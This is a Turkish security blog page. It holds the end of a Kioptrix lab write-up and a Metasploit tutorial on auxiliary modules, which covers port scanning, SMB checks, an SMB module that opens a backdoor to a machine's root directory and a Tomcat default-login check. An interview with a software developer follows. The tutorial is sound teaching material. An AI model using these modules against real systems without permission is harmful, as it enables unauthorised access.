ilgili bilgi alıyorum.Kullanımı oldukça basit. -b ile hangi platformu ve -v ile verbose output almamı sağlayıp exploit ediyorum.Pek de numarası yok. smbSON Bu exploit de priv işlemini bizim için otomatik yapıyor.Bu makine biraz kolay oldu.Diğer kioptrix çözümünde görüşmek üzere .....
Metasploit – Auxiliary Nedir Ve Ne İşe Yarar? [4.1]
Nisan 14, 2020
Siber Güvenlik
Selamlar dostlar Metasploit serisinin yeni yazısına hoş geldiniz. Bu yazımda auxiliarylere değineceğim. Ne işe yarar türleri nelerdir vs. vs. Şimdi gelin şöyle bir bakalım neymiş auxiliary. Auxiliary Nedir? Auxiliary dediğimiz modüller bilgi toplamaya yarıyor. İşte port taraması mı dersiniz user enumeration mı dersiniz birçok bilgiyi bizim için toplayabiliyor. Analiz için ve test için de kullanabiliyoruz hatta bazı durumlarda exploit gibi kullanabiliyoruz. Metasploitin içerisinde çok sayıda auxiliary mevcut peki auxiliarylerin türleri nedir bir bakalım. Gördüğünüz gibi birçok auxiliary çeşidi var. Burada 20 falan gözüküyor ama her an yenisi çıkmış olabilir :D. Tabi ben 20’sine de değinmeyeceğim. O kadar vaktimiz yok sık kullanılanlara baksak yeter. O zaman başlayalım. Scanner Scanner türü en çok kullanılan tür desek yeridir. Bunlar da içerisinde ayrılıyor tabi, nasıl ayrılıyor derseniz. Yukarıda görüldüğü gibi scanner modüllerini servislerde ve belirli yazılımlarda kullanabiliyoruz. Peki abi kullanabiliyoruz da ne yapıyor bunlar? Seçtiğiniz scanner türüne göre değişir. Port tarayabilirsiniz mesela ya da servisler hakkında bilgi toplayabilirsiniz. Mesela şöyle bir örnek yapalım port tarayalım. “search scanner type:Auxiliary” komutuyla tüm scannerları listeledim. İşaretlilerde gördüğünüz gibi port taramak için kulanılabilecek auxiliary modülleri. Tcp yi seçelim ve şu işleme devam edelim. “use auxiliary/scanner/portscan/tcp” komutuyla modlümü seçtim ve artından “set RHOSTS 10.10.10.172” komutuyla da ip adresini verdim. Görüğünüz gibi birçok ayarı var modülün ancak hepsini doldurma gibi bir gereksinimimiz yok. Ben ip yi verdim ve çalıştırdım. Resimde de gözüktüğü gibi bana açık portları verdi. Tabi siz yine de port taramaları için nmap aracını kullanın bu da ufak bir öneri. Şimdi benim verdiğim ip de 445 portu açıkmış bu “smb” servisinin portu. Bir örnek daha yapalım smb servisi hakkında bilgi toplayalım. “smb” serivisi için birçok scanner varmış. Ben aralarından bu işaretlediğim modülü kullanmak istiyorum. Bu modül karşıda çalışan “smb” servisinin versiyon 2 olup olmadığını anlamamı sağlayacak bir modül. Modülümü seçtim ip adresimi girdim ve çalıştırdım. Bana dönen çıktı ise karşıda çalışan smb versiyonunun 2 olduğunu söylüyor. Bunun gibi daha birçok örnek yapılabilir ancak scannerlara daha fazla değinmeyeceğim. Scannerları özetlemek gerekirse servisler hakkkında birçok bilgiyi toplayabileceğimiz modüllerdir diyebiliriz. Admin Admin modülleri yine scannerlar gibi bazı servisler hakkında bilgi toplamamızı sağlar. Ancak sadece bunla kalmayabiliyor. Yazıya girerken auxiliaryleri exploit gibi kullanabileceğimizi söylemiştim. İşte o modüller ağırlıklı burada birazdan örneklerle de göreceğiz. Tabi bunların da bir sürü çeşidi var hemen gözden geçirelim. Evet yine birbirinden farklı bir sürü servis ve yazılma göre admin modülü var. Seri bir şekilde örneğe geçelim. Bir örnek yapıp admin modüllerini anlamaya çalışalım. “search admin type:Auxiliary” komutuyla modülleri bir listeledim. Hatta ben aralarından birini de seçtim bu modül “smb” servisi yapılandırılırken yapılan bir hatadan dolayı paylaşılması istenmeyen dosyalara erişmek için arka kapı oluşturabiliyor. Hemen ayarlarını yapıp test yapalım. Evet artık bir arka kapımız var modül başarıyla çalıştı. İşte exploit gibi kullanmak dediğim buydu. Şimdi gelin karşı makinanın kök dizininine erişimimiz var mı bakalım. Testimizi yaptık ve evet artık karşı makinanın kök dizininine erişimimiz var. Şimdi son olarak bir admin modülünü daha deneyelim. Bu modül ise karşı makinada çalışan “Apache Tomcat” servisinin default login bilgilerini deniyor. Makinada denedi ve bize şu çıktıyı verdi: http://192.168.226.128:8180/admin [Apache-Coyote/1.1] [Apache Tomcat/5.5] [tomcat/tomcat] Burada Tomcat’in giriş adresinin /admin olduğunu versiyonunun 5.5 olduğunu ve giriş bilgilerinin tomccat/tomcat olduğunu görebiliyoruz. Bir modül ile bu kadar bilgiyi toplayabildik. Kısaca admin modülleri bize servisler ve yazılımlar hakkında birçok bilgi sağlıyor. Bu yazıyı burada noktalıyorum. Tabii ki daha birçok auxiliary yazısı gelecek 20 türün arasından 2 tanesini inceleyip geçmeyeceğim :D. Sıradaki yazıda görüşmek dileğiyle. Herkese iyi çalışmalar....
Mutlu Koçak ile Röportaj
Nisan 12, 2020
Röportajlar
Okurlarımıza kendinizden biraz bahseder misiniz? Ben Mutlu Koçak, bilgisayar mühendisiyim, yazılımla uğraşıyorum ve kadınım. Hedefim bu alandaki kadınlara örnek olmak ve bu alanda başarılı olabileceklerini göstermek. Bu sektöre neden ve nasıl atıldınız? Çocukluğumdan beri bilgisayara ilgim vardı. İlk bilgisayarım 386DX ms-dos makineydi, bilgisayar dergileriyle uyuduğumu hatırlıyorum. Babama yalvarırdım beni nolur bilgisayar fuarına götür diye. Bütün çocuklar oyun oynarken ben bilgisayarlarla kafayı bozmuştum. Projelerle PHP 7 kitabınız var. Peki neden php? 2001 yılında scriptler yaygındı, okuduğum lisenin yönetimiyle dalga geçmek için cjb.net’ten domain alıp PHPNuke scripti kurmuştum. Sonradan dil dosyalarını Türkçeleştirmeye çalışırken ufak ufak syntaxa alıştım ve PHP’yi öğrenmeye karar verdim. Ücretsiz eğitimler vermeye çalışarak birçok kişiye katkı sağlıyorsunuz bu nasıl bir duygu? Ücretsiz eğitimlerle aslında kendime katkı yapıyorum. Öncelikle topluluk önünde en iyi konuşma eğitimidir ücretsiz eğitim vermek. Hiç bilmeyenlere anlatıyorum. Bu sayede teknik olmayan konuları izah etme becerim de gelişiyor. Ayrıca anlattığım konuları önceden çalıştığımdan bilgilerimi tazelemiş oluyorum ki eksiğim çıkmasın. İnsanı gerçekten tatmin eden bir duygu. Bu sektör için üniversite gerekli midir? Üniversite herkes için gerekli. Sadece bilgisayar mühendisliğinden bahsetmiyorum. Doğru düzgün, tabela üniversitesi olmayan ciddi bir kurumda, diğer insanlardan, değerli hocalardan ilham alabilirsiniz ve size yol gösterirler. Bilgisayar Mühendisliği eğitimi ise sizin alanınızda uzmanlaşmak istemenize bağlı. Mobilya mezunu olmadan da süper dolaplar yapabilirsiniz ama üniversitede mobilya profesörü olmak isterseniz, mobilya alanında doktora yapmanız gerekiyor. Kadın yazılımcı olmak sektörde karşınıza zorluklar çıkardı mı? çıkardıysa ne gibi zorluklar bunlar? Kadın yazılımcı olmanın her hangi bir zorluğu yok, kadın olarak aynı kodları yazıyoruz ve aynı bilgisayarları kullanıyoruz. Sektörümüzde kadın olmayı zorlaştıran şey, çağ dışı zihniyete sahip, aptal, öz güvensiz ve cahil bireyler. Aptal, öz güvensiz ve cahil oldukları için kadınlara mobbing uygulamayı, emsallerine göre az para ödemeyi normal bir şey sanıyorlar. Bu tarz bozuk zihniyetli insanlar her zaman dünyanın gerisinde kalıyorlar ve sonuçta bir şey elde edemiyorlar. Hangi yazılım dillerini biliyorsunuz ve sık kullanıp önerdiğiniz dilhangisi dil? PHP uzmanıyım ama son çalıştığım şirketlerde hep JavaScript yazdım, React ve Vue üzerine çalıştım. Ama yapay zeka için tabii ki Python ve R, gömülü sistemler için C, C++ veya Rust, mobil cihazlar için Java veya Swift, web için ise PHP öneriyorum. Ayrıca belirteyim, PHP ölmedi ve daha uzunca bir süre ölmeyecek. Sizce gençlere yazılım ve teknoloji alanında destek yeterli midir? Bu soruyu eğitim alanından alarak cevaplamak istiyorum. Yazılım ve teknoloji alanında iyi bir kariyer istiyorsanız, İngilizce’nizin olması lazım. İngilizce bilmeyen insandan doğru dürüst yazılımcı olmaz. Kaynaklara ulaşamazsınız ve kötü çevirilere muhtaç kalırsınız. Ama onun harici ücretsiz eğitimler çok arttı. Her gün yeni bir online eğitim paylaşılıyor. Ülkemizde birçok genç bu yazılım dünyasına başlamak istiyor, tavsiyeleriniz neler olur? Tavsiyem, her şeyi bildiğini iddia eden öz güveni tavan yapmış tiplerden uzak durmaları. Bu tarz tipler insanın öz güvenini baltalamaya ve başkalarını yetersiz hissettirmeye oynarlar. Bu tarz vasat insanlardan uzak dursunlar, çünkü yanlış yönlendirebiliyorlar insanı. Tavsiyem İngilizceyi öğrenmeleri ve internetteki kaynaklardan daha çok, konuları kitaplardan öğrenmeye çalışmaları. Az buçuk yarım yamalak bilen bile medium üzerinde yalan yanlış şeyler yazabiliyor ki çok gördüm. Ama kitap öyle değil, üzerine ciddi bir emek veriliyor. Önerim bu. Bu köşeyi bana ayırdığınız için teşekkür ederim. Mutlu Koçak Hocamıza bizimle röportaj yaptığı için biz teşekkürlerimizi sunuyoruz. Github...
Yaptığımız röportajları Okumaya Ne Dersiniz?
RÖPORTAJLAR
Ekibimiz
Sizler de ekibimize katılmak istiyorsanız bizimle iletişime geçebilirsiniz.
Emre
Yılmaz
Kurucu
Yunus Emre
Öztürk
Kurucu | Yazar | Geliştirici | Pentester
Serpil
Kılıç
Yazar | Adli Bilişim Müh.
Sena
Tunca
Çevirmen
Dilara
Biçen
Yazar
Ömer Hasan
Durmuş
Yazar | Pentester
Emirhan
ÇİFÇİ
Yazar
Musa
Öztürk
Editör
Mehmet
Öztoprak
Editör
Mustafa
Dede
Grafiker
Projelerimize Göz Atmak İster Misiniz?
Projelerimiz
![[HTB] OpenAdmin WriteUp (10.10.10.171)](https://kernelblog.org/wp-content/uploads/2020/04/HTB-OpenAdmin-WriteUp-10.10.10.171.png)
![Metasploit – Auxiliary Nedir Ve Ne İşe Yarar? [4.1]](https://kernelblog.org/wp-content/uploads/2020/04/Metasploit-–-Auxiliary-Nedir-Ve-Ne-İşe-Yarar.png)
